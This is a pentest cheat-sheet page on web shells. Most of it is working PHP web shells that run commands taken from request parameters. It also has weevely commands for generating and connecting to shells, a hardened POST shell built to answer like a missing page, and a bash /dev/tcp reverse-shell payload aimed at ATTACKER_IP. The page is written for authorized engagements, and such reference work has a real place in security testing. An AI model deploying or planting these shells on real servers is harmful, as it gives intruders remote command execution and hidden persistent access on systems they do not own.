Web shell


A web shell is a script uploaded to a web server that runs commands on the host, usually driven from a browser. When possible, use it only as a foothold and move on to a reverse shell.

The language of the web shell is dictated by what the target web server interprets, such as PHP, JavaScript (Node.js), or .NET. ✨

For a JavaScript (Node.js) back end, uploading the file is not enough: you need to find a way for the application to load and execute it. For PHP, simply request the uploaded file's URL, since the server interprets it on every request.

⚠️ Password-protect your web shells during engagements and randomize the parameter name (e.g., don't use cmd): an unauthenticated shell left on a client's server is a backdoor anyone who finds it can use.

On Kali, the webshells and laudanum packages ship ready-made shells, and SecLists has a Web-Shells directory.

$ ls /usr/share/webshells
$ ls /usr/share/seclists/Web-Shells/
$ ls /usr/share/laudanum/ # laudanum shells have an allowed-IP list; add your own IP before uploading

You may use the web shell to pop a reverse shell. Some payloads will not work as-is depending on the target (for example, the web server's default shell may be /bin/sh, which lacks bash's /dev/tcp redirection). Wrapping the payload in bash -c usually solves it:

bash -c "<reverse shell payload here>"

PHP web shell

PHP web shells are PHP files such as webshell.php. Once uploaded on the target, you execute them by browsing to their URL.

Most web shells below take the command to run from a GET parameter. For instance, [...]/webshell.php?cmd=id runs the id command.

Most shells below are slightly more elaborate so that they handle stderr redirection, multi-line output, a default command, etc. You can always get by with a minimal payload like <?=system($_GET[0]??true);?> and a request such as ?0=whoami.
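The following is an added example, not code from the original page: a hardened variant of the GET shells above that applies the warning about passwords and parameter names. It takes the command over POST (so neither the password nor the command lands in access logs or browser history), checks the password in constant time with hash_equals, restricts the client IP like laudanum does, merges stderr, falls back to a default command, and escapes the output. The parameter name, password and allowed IP are made-up placeholders; regenerate them per engagement.

```php
<?php
// Added example (not from the original page). Placeholder values below are
// assumptions: generate your own, e.g. php -r 'echo bin2hex(random_bytes(6)), "\n";'
const WS_PARAM = 'q7f3a9c2e';          // randomized parameter name instead of "cmd"
const WS_PASS  = 'CHANGE-ME-7d1b4e';   // per-engagement password
const WS_ALLOW = ['203.0.113.5'];      // your own client IP(s) (TEST-NET placeholder)

// Refuse anything that is not an authenticated POST from an allowed IP, and
// answer exactly like a missing file so the shell does not stand out.
// hash_equals() takes the known string first and compares in constant time.
if ($_SERVER['REQUEST_METHOD'] !== 'POST'
    || !in_array($_SERVER['REMOTE_ADDR'], WS_ALLOW, true)
    || !hash_equals(WS_PASS, (string)($_POST['p'] ?? ''))) {
    http_response_code(404);
    exit;
}

// Default to a harmless command; merge stderr so errors are visible too.
$cmd = (string)($_POST[WS_PARAM] ?? 'id');
$out = shell_exec($cmd . ' 2>&1');   // null when the command produced no output

// Escape the output: a command result must not be able to inject HTML/JS into
// the page you are viewing from your own browser.
header('Content-Type: text/html; charset=utf-8');
echo '<pre>' . htmlspecialchars((string)$out, ENT_QUOTES, 'UTF-8') . '</pre>';
```

Drive it with curl rather than a browser, e.g. curl -s -X POST --data-urlencode 'p=CHANGE-ME-7d1b4e' --data-urlencode 'q7f3a9c2e=id' http://TARGET/uploads/webshell.php, and for a reverse shell pass the bash -c wrapped payload as the parameter value (--data-urlencode "q7f3a9c2e=bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'"). Caveat: if the target sits behind a reverse proxy or load balancer, REMOTE_ADDR is the proxy's address and the allowlist will lock you out; adjust or drop that check in that case rather than trusting X-Forwarded-For, which any client can set.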


shell_exec

This is a compact web shell using shell_exec (doc).

<?="<pre>".shell_exec(($_GET['cmd'] ?? "whoami")." 2>&1")."</pre>"; ?>

The <?= short echo tag is always enabled since PHP 5.4, regardless of short_open_tag; on older servers replace ?= with ?php echo.


weevely3

This is a web shell using weevely3 (3.0k ⭐).

# generate webshell.php protected by <password>
$ weevely generate <password> webshell.php
# connect to the uploaded web shell
$ weevely URL/webshell.php <password>
# once connected, :help lists the available modules; ex: create a reverse shell
$ :backdoor_reversetcp IP PORT

phpbash

You can use the semi-interactive phpbash (0.8k ⭐, 2018 🪦).


wwwolf


You can use the semi-interactive wwwolf (0.5k ⭐, 2017 🪦).

preg_replace


In PHP < 7.0.0, the /e (eval) pattern modifier makes preg_replace evaluate the replacement string as PHP code for each match (deprecated with a warning since PHP 5.5.0, removed in 7.0.0). It only helps on such legacy targets:

<?php
echo preg_replace('/a/e', 'system("whoami");', 'a');

exec

This is a web shell using exec (doc). exec fills an array with one entry per output line, so the lines are joined explicitly.

<?php
$output = "";
exec(($_GET["cmd"] ?? "whoami")." 2>&1", $output);
echo "<pre>".implode('<br>', $output)."</pre>";
?>

passthru

This is a web shell using passthru (doc). passthru writes the raw command output directly to the response, so there is nothing to echo.

<?php
echo "<pre>";
// passthru streams the output itself; it returns nothing useful to print
passthru(($_GET["cmd"] ?? "whoami")." 2>&1");
echo "</pre>";
?>

system

This is a web shell using system (doc). system prints the output itself and only returns the last line, so echoing its return value would print that line twice.

<?php
echo "<pre>";
// system prints the output as it runs; don't echo its return value (last line)
system(($_GET["cmd"] ?? "whoami")." 2>&1");
echo "</pre>";
?>

👻 To-do 👻

Stuff that I found, but never read/used yet.